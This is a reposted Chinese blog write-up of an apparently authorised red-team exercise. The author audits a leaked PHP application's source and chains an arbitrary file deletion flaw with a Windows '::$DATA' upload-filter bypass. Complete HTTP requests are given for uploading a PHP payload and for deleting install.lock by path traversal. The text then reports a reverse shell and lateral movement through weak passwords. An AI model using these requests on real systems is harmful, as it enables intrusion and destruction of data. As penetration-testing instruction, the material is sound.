报告,我已打入敌方内部
2021-02-24 18:00:00 Author: mp.weixin.qq.com(查看原文) 阅读量:65 收藏

原创稿件征集

邮箱:[email protected]

QQ:1272460312

黑客与极客相关,互联网安全领域里的热点话题

漏洞、技术相关的调查或分析

稿件通过并发布还能收获200-800元不等的稿酬

下载后打开,发现是程序的源码,sql文件都在里面。
找程序中找到的数据库的ip、账号、密码等信息,试试能不能连接。

审计源码,发现漏洞

既然连接不上,那么只能审计一下源码了,先拿工具扫一下。
经过查看,发现/application/index/controller/system/SystemUpgradeclient.php中的setcopydel方法可以任意提交参数。
可以看到以post方式接收了俩个参数,一个是id,一个是ids
if (is_array($post['ids'])) {    foreach ($post['ids'] as $file) {        $fileservice->del_dir(ROOT_PATH . 'public' . DS . 'copyfile' . $file);    }}
if ($post['id']) { $copyFile = ROOT_PATH . 'public' . DS . 'copyfile' . $post['id']; // echo $copyFile;exit; $fileservice->del_file($copyFile);}
ids是需要数组的,然后拼接路径,传入$fileservice->del_dir()方法中。
id没有类型判断,直接拼接路径传入$fileservice->del_file()方法中。
那来看看这俩个方法中做了什么事情。
$fileservice->del_dir()方法是删除目录

删除目录,看来这是一个任意文件删除漏洞,分析下源码。

static function del_dir($dirName){    if (!file_exists($dirName)) # 判断文件或目录是否存在,不存在就返回false    {        return false;    }    $dir = opendir($dirName);   # 打开一个目录,读取它的内容    while ($fileName = readdir($dir))    {        $file = $dirName . '/' . $fileName;        if ($fileName != '.' && $fileName != '..')        {            if (is_dir($file))  # 判断是不是目录,是目录就在调用一次本身方法            {                self::del_dir($file);            }            else            {                unlink($file);  # 删除文件            }        }    }    closedir($dir);    return rmdir($dirName);     # 删除目录}
$fileservice->del_file()方法是删除文件
这就没有什么好说的了,判断文件是否存在,然后删除。但是,这是hw啊,这漏洞什么用都没有啊,只能继续找其他漏洞了。
经过漫长的查找终于在
\application\admin\controller\setting\SystemConfig.php中的发现了view_upload上传的方法。
这个方法中,type为3的时候是上传文件的,然后传入Upload::file方法。
但是在这个方法中判断了后缀名不能为php,但是在win的系统中,可以通过以下的一些方法绕过。
.php..php(空格).php:1.jpg.php::$DATA.php::$DATA…….等等、、、
经过尝试,发现使用1.php::$DATA这样的方式可以绕过,构造的post数据包为:
POST /index.php/admin/setting.system_config/view_upload.html HTTP/1.1Host: xxx.comContent-Length: 403Cache-Control: max-age=0Origin: http://xxx.comUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryP7jKNcoemK2sybZbUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Referer: http://xxx.com/index.php/admin/setting.system_config/index_alone?tab_id=1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=es9ef1h1c9i0t21brcrlqigfmtConnection: close
------WebKitFormBoundaryP7jKNcoemK2sybZbContent-Disposition: form-data; name="file"
site_logo------WebKitFormBoundaryP7jKNcoemK2sybZbContent-Disposition: form-data; name="type"
3------WebKitFormBoundaryP7jKNcoemK2sybZbContent-Disposition: form-data; name="site_logo"; filename="1.php::$DATA"Content-Type: image/png
<?phpphpinfo();?>------WebKitFormBoundaryP7jKNcoemK2sybZb--
成功上传文件,但是这个文件上传需要后台登录才能上传,后台之前就已经爆破过了,没有爆破出来账号密码。但是这个程序有install文件,根据经验知道程序安装文件都会在安装后创建一个文件,来判断是否已经安装,所以在看看是否和我想的一样。
可以看到确实是生成了一个install.lock文件来判断是否安装成功,那么我们可以通过之前的任意文件删除漏洞来删除这个文件让系统进行重装。
但是这个删除文件,对系统进行重装,这就得问问裁判组能不能让了啊,经常协商,他们觉得这个程序不重要,在能保证不破坏程序的时候可以做。
既然他们说可以了,那么我就小心翼翼的构造一下post包,别真的给程序破坏了。

利用漏洞拿到shell

删除install.lock文件的数据包:
POST /index.php/admin/system.System_Upgradeclient/setcopydel HTTP/1.1Host: www.xxx.wangContent-Length: 26Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: http://www.xxx.wangContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://www.xxx.wang/index.php/admin/system.System_Upgradeclient/setcopydelAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: PHPSESSID=8itmp7itfo1va6uu7bu0ouhgosConnection: close
id=/../install/install.lock&ids=1
返回值是成功的,看来没有问题,那就到重装系统的时候了,为了不对系统的数据造成破坏,我们对系统安装需要连接的mysql放到自己的服务器中。
成功登录后台,然后上传shell,还是之前的那个数据包,没有什么好说的,拿到shell后我用nc反弹一下,查看了系统上都有什么程序,发现这个系统上存在五个程序。
既然上来了,那就收集一下信息,然后把流量代理出去扫描一下,结果发现:
只是扫描了一下下而已,这个多弱口令,这稳了,通过这些弱口令在来做横向移动,一共拿下了近百台的机器,得了3600分。
报告,我已打入敌方内部!
了解命令注入漏洞的原理有很多种,今天,我们尝试通过代码审计来掌握挖掘命令注入漏洞!你可以复制链接进行更进一步的操作。
https://www.hetianlab.com/expc.do?ec=ECIDf80c-799d-4bd5-979c-475ff391351a&pk_campaign=weixin-wemedia#stu     

可点击下方“阅读原文”体验同款靶场实操

文章来源: http://mp.weixin.qq.com/s?__biz=MjM5MTYxNjQxOA==&mid=2652871107&idx=1&sn=37377424f20890e987d58415ff88256e&chksm=bd59e50e8a2e6c18a1c8a7e4ab4f4ed571b2ce1dbda5795756f9fb44cb2173119f143e93dd98#rd
如有侵权请联系:admin#unsafe.sh